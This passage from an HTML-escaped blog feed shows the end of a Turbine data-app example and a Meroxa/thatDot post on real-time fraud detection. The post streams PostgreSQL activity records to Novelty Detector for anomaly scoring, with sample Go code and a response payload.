        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; csvFiles &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3BucketName&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; prospected &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;csvFiles&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;digForGold&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
        &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; analytics &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;prospected&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;salesLeads&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;This was one of the more complex use cases, but it helped exercise and showcase the power of &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started&quot;&gt;Turbine&lt;/a&gt;. There’s so much power in leveraging plain code interspersed with the advantages Turbine provides. For obvious reasons, we aren’t open sourcing this app 😊 but if you have questions, please contact us via our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt; or at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;If you’d like to see more data app examples, please feel free to make your request in our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord channel&lt;/a&gt;. Otherwise, Get started by &lt;a href=&quot;https://share.hsforms.com/1A4g2JcLMQpSGj-Z7bjx7uAc2sme&quot;&gt;requesting a free demo of Meroxa&lt;/a&gt; and build something cool. Your app could also be featured in our “Data App Spotlight” series.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real-Time Fraud Detection with Turbine and Novelty Detector]]></title><description><![CDATA[What if you could easily access and use categorical data to detect dangerous anomalies? With Turbine and thatDot Novelty Detector, you can.]]></description><link>https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-fraud-detection-with-turbine-and-novelty-detector</guid><dc:creator><![CDATA[Co-authored by Meroxa and thatDot]]></dc:creator><pubDate>Wed, 17 Aug 2022 17:16:01 GMT</pubDate><content:encoded>&lt;p&gt;Most fraud detection is based on numeric data. Why? Because it&apos;s easier. Categorical data is hard to analyze and virtually impossible to analyze in real-time. Behavioral and profile data can provide the necessary info to detect an anomaly. And we’re not talking about just scoring the categorical data in order to make the models easier. With Meroxa Turbine and thatDot Novelty Detector accessing and analyzing categorical data just got a lot easier.&lt;/p&gt;
&lt;p&gt;Turbine is Meroxa’s a real-time data application framework that makes it easy to turn your data pipelines into data applications. The vision for the Meroxa Data Platform and Turbine is to empower Software Engineers to build and deploy Data Apps; data processing applications that manipulate, enrich and analyze data that solve problems and derive value for the business.&lt;/p&gt;
&lt;p&gt;An appealing aspect of the Turbine framework is that it enables the use of highly specialized tools such as thatDot’s Novelty Detector product. Novelty Detector is a real-time anomaly detection tool that uses categorical data to help you find anomalies in your data that you may not have otherwise been able to find while greatly reducing false positives.&lt;/p&gt;
&lt;p&gt;Together, these two tools can help you build a data infrastructure powerful enough to handle large volumes of data and that can quickly identify anomalies. This can be a valuable addition to any software stack, as it can help you and your customers avoid costly mistakes and quickly identify and fix problems.&lt;/p&gt;
&lt;p&gt;In this blog we’ll outline a simple Turbine Data App that leverages Novelty Detector to highlight novel, noteworthy or otherwise interesting user activities in real-time.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/novelty-app.png&quot; alt=&quot;novelty-app&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Prerequisite:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Sign up for a Meroxa account and install the latest Meroxa CLI.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Setup your Novelty Environment and obtain credentials.&lt;/li&gt;
&lt;li&gt;Clone the example to your local machine:&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;git clone &lt;a href=&quot;mailto:git@github.com&quot;&gt;git@github.com&lt;/a&gt;:meroxa/novelty.git&lt;/p&gt;
&lt;p&gt;Since this example uses Go, you will need to have Go installed.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;How it works:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The novelty Turbine app takes use of activity data (e.g. user A carried out action B at time T) from a PostgreSQL database and streams it in real-time to the Novelty Detector server. The Novelty Detector server scores each &quot;observation&quot; for novelty, adding some additional anomaly metadata, which is then injected back into the PostgreSQL database.&lt;/p&gt;
&lt;p&gt;Here’s an example Novelty Detector response payload:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;observation&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
		&lt;span class=&quot;token string&quot;&gt;&quot;my&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;sample&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;observation&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;score&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.36231689108923804&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;totalObsScore&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.36231689108923804&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;sequence&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;probability&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.6666666666666666&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;uniqueness&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.9943363088569088&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;infoContent&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.5849625007211563&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
	&lt;span class=&quot;token string-property property&quot;&gt;&quot;mostNovelComponent&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;index&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;value&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;observation&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
		&lt;span class=&quot;token string-property property&quot;&gt;&quot;novelty&quot;&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0.5849625007211563&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A full explanation of each field of the payload can be found on the Novelty Detector Usage Guide &lt;a href=&quot;https://www.thatdot.com/product/novelty-detector-docs/usage-guide&quot;&gt;here&lt;/a&gt; but it is worth noting a few of the more interesting payload elements:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;observation - simply the observation originally passed into Novelty Detector, included for reference.&lt;/li&gt;
&lt;li&gt;score - The score is the total calculation of how novel the particular observation is. The value is always between 0 and 1, where zero is entirely normal and not-anomalous, and one is highly novel and clearly anomalous.&lt;/li&gt;
&lt;li&gt;mostNovelComponent - an object, consisting of index, value, and novelty that indicates just how novel is the most novel component of the observation, indicated by index + value.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A key aspect of Novelty Detector, and one of the reasons it pairs so well with Turbine, is its simplicity of operation: once you have connected Turbine to Novelty Detector, it starts scoring observations without requiring any other configuration or setup.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;The core of the Data App looks much like any typical Turbine app, but there are a couple of sections worth digging into.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;formatObservation&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;r turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Record&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	country &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;country&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	city &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;city&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	email &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;email&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	userID &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;user_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	tsFloat &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; r&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Payload&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Get&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;timestamp&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;float64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    tod&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;timeOfDay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;int&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;tsFloat&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;tod: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; tod&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
    
    &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;error in formatObservation: %s&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
    obs &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;tod&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; country&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; city&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; email&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Sprint&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;userID&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
	log&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Printf&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;obs: %+v&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; obs&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; obs
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we’re formatting the observation as an array of categorical data, starting with the value with the lowest cardinality (or the most significant).&lt;/p&gt;
&lt;p&gt;A particularly interesting optimization is the &lt;em&gt;bucketing&lt;/em&gt; of time data in the form of the &lt;code class=&quot;language-text&quot;&gt;timeOfDay&lt;/code&gt; function.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;timeOfDay&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;t &lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token builtin&quot;&gt;string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token builtin&quot;&gt;error&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	intTime&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; strconv&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;ParseInt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;t&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;10&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;64&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; err &lt;span class=&quot;token operator&quot;&gt;!=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; err
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	ts &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; time&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Unix&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;intTime&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

	splitAfternoon &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;12&lt;/span&gt;
	splitEvening &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;17&lt;/span&gt;
	splitNight &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;21&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitAfternoon &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;morning&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; splitAfternoon &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitEvening &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;afternoon&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    
	&lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&gt;=&lt;/span&gt; splitEvening &lt;span class=&quot;token operator&quot;&gt;&amp;amp;&amp;amp;&lt;/span&gt; ts&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Hour&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;&amp;lt;&lt;/span&gt; splitNight &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
		&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;evening&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
	&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

	&lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;night&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;nil&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The function takes a unix timestamp value and maps it to &lt;em&gt;morning, afternoon, evening&lt;/em&gt; or &lt;em&gt;night.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;You can find the full example for this data app on &lt;a href=&quot;https://github.com/meroxa/novelty/blob/main/app.go&quot;&gt;GitHub&lt;/a&gt;. We can&apos;t wait to see what you build 🚀&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Additional resources:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://youtu.be/MGNgED5V4FI&quot;&gt;Watch a replay&lt;/a&gt; of our Real-Time Categorical Data-Based Anomaly Detection webinar&lt;/li&gt;
&lt;li&gt;Join the &lt;a href=&quot;https://discord.com/invite/pN24QPca6b/&quot;&gt;Meroxa Community&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Learn more about thatDot’s &lt;a href=&quot;https://www.thatdot.com/product/novelty-detector&quot;&gt;Novelty Detector&lt;/a&gt;&lt;/li&gt;
